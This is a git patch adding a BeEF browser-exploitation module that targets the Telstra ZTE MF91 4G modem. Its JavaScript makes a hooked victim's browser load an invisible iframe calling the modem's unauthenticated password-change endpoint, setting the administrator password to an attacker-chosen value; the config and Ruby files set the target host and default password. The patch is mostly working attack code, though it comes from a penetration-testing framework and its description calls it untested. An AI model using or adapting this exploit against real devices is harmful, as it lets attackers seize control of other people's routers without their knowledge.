From c46cd03de8a22989dc6a9c9b83b2b08c885045fd Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sun, 22 Feb 2015 07:35:56 +0000
Subject: [PATCH] Add Telstra ZTE MF91 Change Password module

---
 .../telstra_zte_mf91_change_pw/command.js     | 23 +++++++++++++++++++
 .../telstra_zte_mf91_change_pw/config.yaml    | 19 +++++++++++++++
 .../telstra_zte_mf91_change_pw/module.rb      | 19 +++++++++++++++
 3 files changed, 61 insertions(+)
 create mode 100644 modules/exploits/router/telstra_zte_mf91_change_pw/command.js
 create mode 100644 modules/exploits/router/telstra_zte_mf91_change_pw/config.yaml
 create mode 100644 modules/exploits/router/telstra_zte_mf91_change_pw/module.rb

diff --git a/modules/exploits/router/telstra_zte_mf91_change_pw/command.js b/modules/exploits/router/telstra_zte_mf91_change_pw/command.js
new file mode 100644
index 000000000..295865a25
--- /dev/null
+++ b/modules/exploits/router/telstra_zte_mf91_change_pw/command.js
@@ -0,0 +1,23 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var password = '<%= @password %>';
+  var timeout = 15;
+
+  var telstra_zte_mf91_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  telstra_zte_mf91_iframe_<%= @command_id %>.setAttribute('src', 'http://'+rhost+'/goform/upd_pwd?password='+password);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(telstra_zte_mf91_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/telstra_zte_mf91_change_pw/config.yaml b/modules/exploits/router/telstra_zte_mf91_change_pw/config.yaml
new file mode 100644
index 000000000..8bc2d462c
--- /dev/null
+++ b/modules/exploits/router/telstra_zte_mf91_change_pw/config.yaml
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# References:
+# http://www.sw1tch.net/blog/pwning-telstras-zte-mf91-4g-modem
+# http://www.zte.com.au/downloads/manuals/MF91_Help.pdf
+#
+beef:
+    module:
+        telstra_zte_mf91_change_pw:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Telstra ZTE MF91 Change Password"
+            description: "Attempts to change the administrator password on a Telstra ZTE MF91 Pre-paid 4G modem.<br/><br/>The ZTE MF91 reportedly does not require authentication to change the password.<br/><br/>This module has not been tested."
+            authors: ["sw1tch"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/router/telstra_zte_mf91_change_pw/module.rb b/modules/exploits/router/telstra_zte_mf91_change_pw/module.rb
new file mode 100644
index 000000000..86f02215e
--- /dev/null
+++ b/modules/exploits/router/telstra_zte_mf91_change_pw/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Telstra_zte_mf91_change_pw < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'rhost', 'ui_label' => 'Target', 'value' => 'telstra.wifi.4g'}, 
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end